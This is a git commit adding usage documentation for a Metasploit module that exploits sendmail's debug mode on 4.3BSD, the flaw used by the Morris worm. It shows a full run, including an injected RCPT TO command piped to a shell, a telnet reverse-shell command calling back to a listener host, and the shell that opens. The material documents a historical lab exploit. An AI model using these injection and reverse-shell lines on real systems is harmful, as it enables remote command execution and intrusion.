Add module doc
William Vu
parent
58a6c4137d
commit
8a6075c882
|
|
@ -0,0 +1,101 @@
|
|||
## Intro
|
||||
|
||||
This module exploits `sendmail`'s well-known historical debug mode to
|
||||
escape to a shell and execute commands in the SMTP `RCPT TO` command.
|
||||
|
||||
This vulnerability was exploited by the Morris worm in 1988-11-02.
|
||||
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
|
||||
|
||||
## Setup
|
||||
|
||||
A Docker environment for 4.3BSD on VAX is available at
|
||||
<https://github.com/wvu/ye-olde-bsd>.
|
||||
|
||||
For manual setup, please follow the Computer History Wiki's
|
||||
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
|
||||
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
|
||||
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
|
||||
|
||||
## Targets
|
||||
|
||||
```
|
||||
Id Name
|
||||
-- ----
|
||||
0 @(#)version.c 5.51 (Berkeley) 5/2/86
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
**RPORT**
|
||||
|
||||
Set this to the target port. The default is 25 for `sendmail`, but the
|
||||
port may be forwarded when NAT (SLiRP) is used in SIMH.
|
||||
|
||||
**PAYLOAD**
|
||||
|
||||
Set this to a Unix command payload. Currently only `cmd/unix/reverse`
|
||||
and `cmd/unix/generic` are supported.
|
||||
|
||||
## Usage
|
||||
|
||||
```
|
||||
msf5 exploit(unix/smtp/morris_sendmail_debug) > options
|
||||
|
||||
Module options (exploit/unix/smtp/morris_sendmail_debug):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
|
||||
RPORT 25 yes The target port (TCP)
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.1.5 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 @(#)version.c 5.51 (Berkeley) 5/2/86
|
||||
|
||||
|
||||
msf5 exploit(unix/smtp/morris_sendmail_debug) > run
|
||||
|
||||
[*] Started reverse TCP double handler on 192.168.1.5:4444
|
||||
[*] 127.0.0.1:25 - Connecting to sendmail
|
||||
[*] 127.0.0.1:25 - Enabling debug mode and sending exploit
|
||||
[*] 127.0.0.1:25 - Sending: DEBUG
|
||||
[*] 127.0.0.1:25 - Sending: MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
|
||||
[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
|
||||
[*] 127.0.0.1:25 - Sending: DATA
|
||||
[*] 127.0.0.1:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc
|
||||
[*] 127.0.0.1:25 - Sending: export PATH
|
||||
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)'
|
||||
[*] 127.0.0.1:25 - Sending: .
|
||||
[*] 127.0.0.1:25 - Sending: QUIT
|
||||
[*] Accepted the first client connection...
|
||||
[*] Accepted the second client connection...
|
||||
[*] Command: echo zqhqKJD7trW0E0Lp;
|
||||
[*] Writing to socket A
|
||||
[*] Writing to socket B
|
||||
[*] Reading from sockets...
|
||||
[*] Reading from socket B
|
||||
[*] B: "zqhqKJD7trW0E0Lp\r\n"
|
||||
[*] Matching...
|
||||
[*] A is input...
|
||||
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500
|
||||
[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
|
||||
[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you
|
||||
|
||||
whoami
|
||||
daemon
|
||||
cat /etc/motd
|
||||
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986
|
||||
|
||||
Would you like to play a game?
|
||||
```
|
||||
Loading…
Reference in New Issue